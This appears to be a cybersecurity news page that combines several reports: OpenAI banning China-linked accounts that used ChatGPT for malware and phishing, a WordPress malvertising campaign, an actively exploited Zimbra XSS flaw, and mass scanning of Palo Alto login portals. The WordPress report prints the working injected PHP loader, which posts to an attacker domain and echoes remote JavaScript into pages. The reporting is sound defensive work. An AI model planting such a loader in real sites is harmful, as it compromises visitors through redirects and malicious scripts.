In an era where AI and SaaS applications underpin daily workflows, organizations face an unprecedented challenge: the invisible exfiltration of sensitive information. Traditional, file-based data loss prevention (DLP) measures were designed for attachments and downloads, but today’s risk landscape extends far beyond simple file movements. As employees increasingly rely on Generative AI tools and unmanaged […]
OpenAI announced it has banned a series of ChatGPT accounts linked to Chinese state-affiliated hacking groups that used the AI models to refine malware and create phishing content.
The October 2025 report details the disruption of several malicious networks as part of the company’s ongoing commitment to preventing the abuse of its AI technologies by threat actors and authoritarian regimes.
Since February 2024, OpenAI has disrupted over 40 networks that violated its usage policies. The company stated that it continues to see threat actors incorporate AI into existing strategies to increase speed and efficiency, rather than developing novel offensive capabilities with the models.
China-Linked Actors Enhance Cyber Operations
A key case study in the report focuses on a group named OpenAI, named “Cyber Operation Phish and Scripts.” This cluster of accounts, operated by Chinese-speaking individuals, was used to assist in malware development and phishing campaigns.
OpenAI’s investigation found that the group’s activities were consistent with cyber operations serving the intelligence requirements of the People’s Republic of China (PRC). The activity also overlapped with threat groups publicly tracked as UNKDROPPITCH and UTA0388.
These hackers used ChatGPT for two primary functions:
Malware Development: They used the AI to help develop and debug tooling, with implementation details overlapping with malware known as GOVERSHELL and HealthKick. The actors also researched further automation possibilities using other AI models like DeepSeek.
Phishing Content Generation: The group created targeted and culturally tailored phishing emails in multiple languages, including Chinese, English, and Japanese. Their targets included Taiwan’s semiconductor sector, U.S. academia, and organizations critical of the Chinese government.
OpenAI noted that the actors used the models to gain “incremental efficiency,” such as crafting better phishing emails and shortening coding cycles, rather than creating new types of threats.
The report also detailed the disruption of other accounts linked to Chinese government entities. These users attempted to employ ChatGPT for developing surveillance and profiling tools.
One banned user sought help in drafting a proposal for a “High-Risk Uyghur-Related Inflow Warning Model,” designed to analyze travel bookings and police records.
Another instance involved an attempt to design a “social media probe” capable of scanning platforms like X (formerly Twitter), Facebook, and Reddit for political, ethnic, and religious content deemed “extremist.”
Other users were banned for using the AI to research critics of the Chinese government and identify the funding sources of accounts critical of the PRC.
Mitigations
In response to these findings, OpenAI disabled all accounts associated with the malicious activities and shared indicators of compromise with industry partners to aid in broader cybersecurity efforts.
The report emphasizes that the AI models themselves often acted as a safety barrier, refusing direct requests to generate malicious code or execute exploits. The actors were limited to generating “building-block” code snippets that were not inherently malicious on their own.
OpenAI’s findings indicate that while state-sponsored actors are actively experimenting with AI, its primary use is to augment existing operations.
The company stressed that it continues to invest in detecting and disrupting such abuses to prevent its tools from being used for malicious cyber activity, scams, and covert influence operations.
Cyber Awareness Month Offer: Upskill With 100+ Premium Cybersecurity Courses From EHA's Diamond Membership: Join Today
In a groundbreaking disclosure, CloudSEK’s TRIAD unit has unearthed internal operational materials that shed light on Charming Kitten (APT35), revealing an intricate espionage apparatus linked to Iran’s Islamic Revolutionary Guard Corps (IRGC). The leak comprises over 100 Persian-language files marked with Jalali calendar dates and aligned with Tehran time, underscoring its authenticity. At the apex, […]
In a sophisticated evolution of email-based attacks, adversaries have begun leveraging Cascading Style Sheets (CSS) to inject hidden “salt” — irrelevant content used to confuse detection systems — deep within HTML emails. Cisco Talos’s year-long monitoring (March 1, 2024 – July 31, 2025) reveals a marked increase in the abuse of CSS properties to conceal […]
WordPress websites have become a prime target for threat actors seeking to monetize traffic and compromise visitor security.
In recent months, a new malvertising campaign has emerged, leveraging silent PHP code injections within theme files to serve unwanted third-party scripts.
The attack blends seamlessly with legitimate site operations, delivering obfuscated JavaScript that redirects visitors, displays pop-ups, and evades security tools without raising suspicion.
Initially discovered by a site owner noticing unexplained script loads, the intrusion originated from a small block of PHP code appended to the active theme’s functions.php file.
This injection did not alter visible page content, instead executing behind the scenes on every request.
Sucuri analysts identified the campaign after detecting anomalous JavaScript calls to attacker-controlled domains and blocklisting by multiple security vendors.
The attack primarily exploits weak file permissions and outdated themes. By gaining write access—often through compromised credentials or vulnerable plugins—hackers insert a seemingly benign function that contacts a command-and-control server.
Once invoked via the wp_head hook, the function fetches a dynamic JavaScript payload and echoes it into the page’s <head> section, ensuring execution before the rest of the page loads.
Sucuri researchers noted that the injected function establishes a POST connection to a remote endpoint at hxxps://brazilc[.]com/ads.php, retrieves the malicious script, and embeds it directly into the HTML document.
The payload performs two main actions: loading a traffic-distribution script from porsasystem.com/6m9x.js and injecting a hidden 1×1 pixel iframe that mimics Cloudflare’s challenge platform.
These techniques enable forced redirects, pop-ups, and evasion of security scanners by disguising malicious activity as legitimate CDN operations.
Infection Mechanism
The infection mechanism hinges on the following PHP function injected into functions.php:-
// Injected PHP function in functions.php
function ti_custom_javascript() {
$response = wp_remote_post(
'https://brazilc.com/ads.php',
array('timeout' => 15, 'body' => array('url' => home_url()))
);
if (!is_wp_error($response)) {
echo wp_remote_retrieve_body($response);
}
}
add_action('wp_head', 'ti_custom_javascript');
Upon each page load, this function silently executes, contacting the C&C server and printing the returned JavaScript payload into the page header.
Payload (Source – Sucuri)
The attacker’s script then loads further malicious code asynchronously, leveraging attributes like data-cfasync='false' and async to bypass Cloudflare Rocket Loader.
By embedding within a hidden iframe, the malware evades detection and resides persistently until the injected code is removed.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
Cybersecurity researchers at GreyNoise have identified a dramatic escalation in malicious scanning activities targeting Palo Alto Networks PAN-OS GlobalProtect login portals, with attacks originating from over 2,200 unique IP addresses as of October 7, 2025. This represents a significant increase from the approximately 1,300 IPs initially observed on October 3, demonstrating the rapidly evolving nature […]
In 2025, account takeover (ATO) attacks remain one of the most critical cybersecurity risks facing businesses, especially in industries like e-commerce, banking, SaaS, and healthcare. Hackers continuously launch credential stuffing, phishing, and brute-force attacks, targeting user information to steal funds, gain unauthorized access, or cause reputational damage. Organizations cannot afford to overlook the importance of […]
CISA has issued a critical warning regarding a zero-day cross-site scripting (XSS) vulnerability in Synacor’s Zimbra Collaboration Suite (ZCS), designated as CVE-2025-27915.
This vulnerability has been actively exploited in attacks and poses significant risks to organizations using the popular email and collaboration platform.
Zimbra Collaboration Suite (ZCS) XSS Flaw
The vulnerability exists within the Classic Web Client component of Zimbra Collaboration Suite and stems from insufficient sanitization of HTML content in ICS (Internet Calendar System) files.
The security flaw is classified under CWE-79, which specifically addresses improper neutralization of input during web page generation.
When users view email messages containing malicious ICS entries, embedded JavaScript code executes automatically through an ontoggle event handler within a <details> tag.
This exploitation vector allows attackers to run arbitrary JavaScript code within the victim’s authenticated session context.
The attack mechanism bypasses standard security controls by leveraging legitimate calendar file functionality to deliver malicious payloads.
The vulnerability’s exploitation requires minimal user interaction – simply viewing a specially crafted email message triggers the malicious code execution.
This low barrier to exploitation makes it particularly dangerous for widespread attacks targeting multiple organizations simultaneously.
Risk Factors
Details
Affected Products
Zimbra Collaboration Suite (ZCS) 10.1.9ZCS 10.0.15ZCS 9.0.0 Patch 46
Impact
Cross-site scripting
Exploit Prerequisites
Victim must view a crafted email containing a malicious ICS calendar entry in the Classic Web Client; user interaction required; attacker needs a valid account or email delivery capability
CVSS 3.1 Score
5.4 (Medium)
Mitigations
The successful exploitation of CVE-2025-27915 enables attackers to perform unauthorized actions within compromised user accounts, including the creation of malicious email filters that redirect incoming messages to attacker-controlled addresses.
This capability facilitates comprehensive data exfiltration and ongoing surveillance of victim communications.
CISA has designated October 28, 2025, as the mandatory remediation deadline for federal agencies under Binding Operational Directive (BOD) 22-01.
Organizations must apply vendor-provided mitigations, implement applicable cloud service guidance, or discontinue product usage if effective mitigations remain unavailable.
The agency emphasizes that this vulnerability’s active exploitation status requires immediate attention from all Zimbra Collaboration Suite administrators.
Security teams should monitor the official Zimbra Security Center and National Vulnerability Database for updated mitigation guidance and patches.
Organizations should also implement additional email securitycontrols, including enhanced attachment scanning and user awareness training focused on suspicious calendar invitations and ICS file attachments.
Cyber Awareness Month Offer: Upskill With 100+ Premium Cybersecurity Courses From EHA's Diamond Membership: Join Today
A massive escalation in attacks targeting Palo Alto Networks PAN-OS GlobalProtect login portals, with over 2,200 unique IP addresses conducting reconnaissance operations as of October 7, 2025.
This represents a significant surge from the initial 1,300 IPs observed just days earlier, marking the highest scanning activity recorded in the past 90 days according to GreyNoise Intelligence monitoring.
The reconnaissance campaign began with a sharp 500% increase in scanning activity on October 3, 2025, when researchers observed approximately 1,300 unique IP addresses probing Palo Alto login portals.
This initial surge already represented the largest burst of scanning activity in three months, with daily volumes previously rarely exceeding 200 IPs during the preceding 90-day period.
2,200 IPs Scan Palo Portals
Palo Alto PAN-OSGlobalProtect Login Portals Surge
The escalating attack campaign demonstrates sophisticated coordination across geographically distributed infrastructure.
GreyNoise analysis reveals that 91% of the malicious IP addresses are geolocated to the United States, with additional clusters concentrated in the United Kingdom, the Netherlands, Canada, and Russia.
Security researchers have identified approximately 12% of all ASN11878 subnets allocated to scanning Palo login portals, indicating significant infrastructure commitment to this operation.
The attack methodology suggests threat actors are systematically iterating through large credential databases, with login attempt patterns indicating automated brute-force operations against GlobalProtect SSL VPN portals.
Pace of Palo Alto unique login attempts
GreyNoise has published a comprehensive dataset containing unique usernames and passwords from Palo login attempts observed during the past week, enabling security teams to assess potential credential exposure.
Technical analysis reveals that 93% of participating IP addresses were classified as suspicious, while 7% received malicious designations.
1,285 Unique IPs probing Palo Alto login portals
The scanning activity exhibits distinct regional clustering patterns with separate TCP fingerprints, suggesting multiple coordinated threat groups operating simultaneously.
Security researchers have identified potential correlations between the Palo Alto scanning surge and concurrent reconnaissance operations targeting Cisco ASA devices.
Both attack campaigns share dominant TCP fingerprints linked to infrastructure in the Netherlands, along with similar regional clustering behaviors and tooling characteristics.
The cross-technology targeting suggests a broader reconnaissance campaign against enterprise remote access solutions.
Concurrent surges observed across multiple remote access service platforms, though the exact relationship between these activities remains under investigation.
The targeted nature of these attacks is evident from their focus on GreyNoise’s emulated Palo Alto profiles, including GlobalProtect and PAN-OS systems.
This precision indicates attackers likely derived target lists from public reconnaissance platforms such as Shodan or Censys, or conducted their own fingerprinting operations to identify vulnerable Palo Alto devices.
Security teams should implement immediate defensive measures, including IP blocklisting of known malicious addresses, enhanced monitoring of GlobalProtect portal authentication logs, and implementation of additional access controls for remote VPN connections.
Cyber Awareness Month Offer: Upskill With 100+ Premium Cybersecurity Courses From EHA's Diamond Membership: Join Today
Brand protection has become a necessity for enterprises in 2025, with increasing risks of counterfeiting, phishing, domain abuse, fake social media accounts, and digital piracy. Businesses today must not only defend their intellectual property but also safeguard their digital presence to maintain customer trust and security. This article presents the top 10 best brand protection […]
.webp)
